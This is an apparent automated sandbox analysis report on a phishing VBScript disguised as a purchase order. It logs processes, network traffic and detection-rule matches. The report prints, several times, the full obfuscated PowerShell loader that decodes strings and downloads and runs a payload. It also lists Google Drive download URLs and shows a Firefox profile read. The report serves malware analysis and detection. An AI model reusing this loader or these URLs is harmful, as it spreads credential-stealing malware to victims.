Source: wab.exe, 00000015.00000002.2577739206.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1NSWYwJ8clchRCA8qFPRUlk146KNVbj_Z&export=download
Source: wab.exe, 00000015.00000003.2383605144.0000000006F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1NSWYwJ8clchRCA8qFPRUlk146KNVbj_Z&export=downloadt
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CDD7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CC438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1yzeORlWdWKE15en4v7t0ymp96mb-KlUQ&export=download
Source: powershell.exe, 00000013.00000002.2384989430.0000000004846000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000F.00000002.2543561723.00000262DBFD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2387916097.0000000005750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CC434000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD7A000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2364536741.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2364451227.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CC434000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD7A000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2364536741.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2364451227.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CC434000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD7A000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2364536741.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2364451227.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CC434000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD7A000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2364536741.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2364451227.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CC434000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD7A000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2364536741.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2364451227.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49709 version: TLS 1.2

System Summary

barindex
Source: amsi32_7904.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7636, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7904, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Purchase Order N#U00b0 20240702.vbs Static file information: Suspicious name
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5167
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 5167
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 5167 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAAC26B4F6 15_2_00007FFAAC26B4F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAAC26C2A2 15_2_00007FFAAC26C2A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAAC2600AD 15_2_00007FFAAC2600AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAAC334F34 15_2_00007FFAAC334F34
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0447F1F0 19_2_0447F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0447FAC0 19_2_0447FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0447EEA8 19_2_0447EEA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_02F24220 21_2_02F24220
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_02F2B5A7 21_2_02F2B5A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_02F24AF0 21_2_02F24AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_02F23ED8 21_2_02F23ED8
Source: Purchase Order N#U00b0 20240702.vbs Initial sample: Strings found which are bigger than 50
Source: amsi32_7904.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7636, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7904, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@11/10@4/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Rundtenommer.Rhy Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0ifmrza.kf5.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order N#U00b0 20240702.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7636
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7904
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order N#U00b0 20240702.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rundtenommer.Rhy && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rundtenommer.Rhy && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rundtenommer.Rhy && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rundtenommer.Rhy && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
